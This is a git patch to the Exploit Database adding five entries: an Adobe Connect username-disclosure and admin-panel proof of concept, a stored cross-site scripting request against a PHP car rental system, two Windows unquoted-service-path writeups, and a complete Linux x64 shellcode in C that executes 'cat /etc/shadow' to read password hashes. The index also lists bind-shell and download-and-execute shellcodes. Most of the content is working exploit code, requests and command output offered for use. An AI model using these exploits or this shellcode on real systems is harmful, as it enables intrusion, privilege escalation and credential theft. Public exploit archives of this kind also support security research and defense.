From 0ebed6d4c41084d331fb1765dd6ee1d8a49b81fc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 10 Feb 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-02-10 5 changes to exploits/shellcodes Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path Online Car Rental System 1.0 - Stored Cross Site Scripting Adobe Connect 10 - Username Disclosure Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) --- exploits/multiple/webapps/49550.txt | 18 ++++++ exploits/php/webapps/49546.txt | 98 +++++++++++++++++++++++++++++ exploits/windows/local/49548.txt | 28 +++++++++ exploits/windows/local/49549.txt | 25 ++++++++ files_exploits.csv | 4 ++ files_shellcodes.csv | 1 + shellcodes/linux_x86-64/49547.c | 63 +++++++++++++++++++ 7 files changed, 237 insertions(+) create mode 100644 exploits/multiple/webapps/49550.txt create mode 100644 exploits/php/webapps/49546.txt create mode 100644 exploits/windows/local/49548.txt create mode 100644 exploits/windows/local/49549.txt create mode 100644 shellcodes/linux_x86-64/49547.c diff --git a/exploits/multiple/webapps/49550.txt b/exploits/multiple/webapps/49550.txt new file mode 100644 index 000000000..31d4a6abd --- /dev/null +++ b/exploits/multiple/webapps/49550.txt @@ -0,0 +1,18 @@ +# Title: Adobe Connect 10 - Username Disclosure +# Author: h4shur +# date:2021-02-07 +# Vendor Homepage: https://www.adobe.com +# Software Link: https://www.adobe.com/products/adobeconnect.html +# Version: 10 and earlier +# Tested on: Windows 10 & Google Chrome +# Category : Web Application Bugs + +### Description : + +By adding this (/system/help/support) to the end of the desired website address, you can view the username without any filter or obstacle. Sometimes even without a username and password. And by adding (/system/login) to the end of the desired website address, you can access the admin panel without any filters. + +### POC : +site.com/system/help/support + +### Admin Panel : +site.com/system/login \ No newline at end of file diff --git a/exploits/php/webapps/49546.txt b/exploits/php/webapps/49546.txt new file mode 100644 index 000000000..a32d1da1a --- /dev/null +++ b/exploits/php/webapps/49546.txt @@ -0,0 +1,98 @@ +# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting +# Date: 9/2/2021 +# Exploit Author: Naved Shaikh +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html +# Version: V 1.0 +# Tested on Windows 10, XAMPP + +Steps: +1) Open http://localhost/car-rental/admin/post-avehical.php + +2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "" and submit + +3) Open the http://localhost/car-rental/ and our Payload excuted. + +Request +POST /car-rental/admin/post-avehical.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965 +Content-Length: 2724377 +Origin: http://localhost +Connection: close +Referer: http://localhost/car-rental/admin/post-avehical.php +Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2 +Upgrade-Insecure-Requests: 1 + +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="vehicletitle" + +TestName +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="brandname" + +2 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="vehicalorcview" + + +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="priceperday" + +200 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="fueltype" + +Diesel +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="modelyear" + +2008 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="seatingcapacity" + +22 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="img1"; filename="Untitled.png" +Content-Type: image/png + +‰PNG + +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="img5"; filename="" +Content-Type: application/octet-stream + + +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="powerdoorlocks" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="antilockbrakingsys" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="driverairbag" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="passengerairbag" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="centrallocking" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="crashcensor" + +1 +-----------------------------13786099262839578593645594965 +Content-Disposition: form-data; name="submit" + + +-----------------------------13786099262839578593645594965-- \ No newline at end of file diff --git a/exploits/windows/local/49548.txt b/exploits/windows/local/49548.txt new file mode 100644 index 000000000..597d9ffd7 --- /dev/null +++ b/exploits/windows/local/49548.txt @@ -0,0 +1,28 @@ +# Exploit Title: Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path +# Discovery by: Hector Gerbacio +# Discovery Date: 2021-02-05 +# Vendor Homepage: https://epson.com.mx/ +# Tested Version: 1.6.0.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 8.1 con Bing + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "EMP_UDSA" | findstr /i /v """ +EMP_UDSA EMP_UDSA C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe Auto + +# Service info: + +C:\>sc qc EMP_UDSA +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: EMP_UDSA + TIPO : 110 WIN32_OWN_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : EMP_UDSA + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49549.txt b/exploits/windows/local/49549.txt new file mode 100644 index 000000000..7d4e0e530 --- /dev/null +++ b/exploits/windows/local/49549.txt @@ -0,0 +1,25 @@ +# Exploit Title: AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path +# Date: 2020-12-11 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: Anytxt.net +# Software Link: https://sourceforge.net/projects/anytxt/files/AnyTXT.Searcher.1.2.394.exe +# Version: Version 1.2.394 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc ATService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ATService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\AnyTXT Searcher\atservice.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AnyTXT Searcher Indexing Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f11189bef..637808d56 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11259,6 +11259,8 @@ id,file,description,date,author,type,platform,port 49530,exploits/windows/local/49530.txt,"Millewin 13.39.146.1 - Local Privilege Escalation",2021-02-08,"Andrea Intilangelo",local,windows, 49535,exploits/windows/local/49535.txt,"AMD Fuel Service - 'Fuel.service' Unquote Service Path",2021-02-08,"Hector Gerbacio",local,windows, 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows, +49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows, +49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43736,3 +43738,5 @@ id,file,description,date,author,type,platform,port 49543,exploits/php/webapps/49543.txt,"WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php, 49544,exploits/php/webapps/49544.txt,"WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php, 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php, +49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php, +49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 4490a70c4..c8766c1ef 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1030,3 +1030,4 @@ id,file,description,date,author,type,platform 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux +49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/49547.c b/shellcodes/linux_x86-64/49547.c new file mode 100644 index 000000000..85f905c54 --- /dev/null +++ b/shellcodes/linux_x86-64/49547.c @@ -0,0 +1,63 @@ +# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes) +# Date: 02-08-2021 +# Author: Felipe Winsnes +# Tested on: Debian x64 +# Shellcode Length: 66 + +/* +global _start + +_start: + + xor rax, rax ; Zeroes out RAX. + xor rbp, rbp ; Zeroes out RBP. + + push rax ; Pushes RAX's NULL-DWORD. + + mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP. + push rbp ; Pushes the vaueof RBP into the Stack. + + mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP. + push rbp ; Pushes the vaue of RBP into the Stack. + + mov rbp, rsp ; Copies the value of the Stack into RBP. + push rax ; Pushes RAX's NULL-DWORD. + + mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX. + push rbx ; Pushes the vaue of RBX into the Stack. + + mov rbx, rsp ; Copies the value of the Stack into RBX. + + mov rdi, rsp ; Copies the value of the Stack into RDI. + push rax ; Pushes RAX's NULL-DWORD. + + mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0. + + push rbp ; Pushes the vaue of RBP into the Stack. + push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow". + + mov rsi, rsp ; Copies this entire string from the Stack into RSI. + + push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format). + pop ax ; Pops this value into AX so there are no NULLs. + syscall ; The syscall is executed. +*/ + + +/* +Usage: +whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w +whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow +*/ + +#include + +unsigned char shellcode[] = \ +"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05"; + +int main() +{ + + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file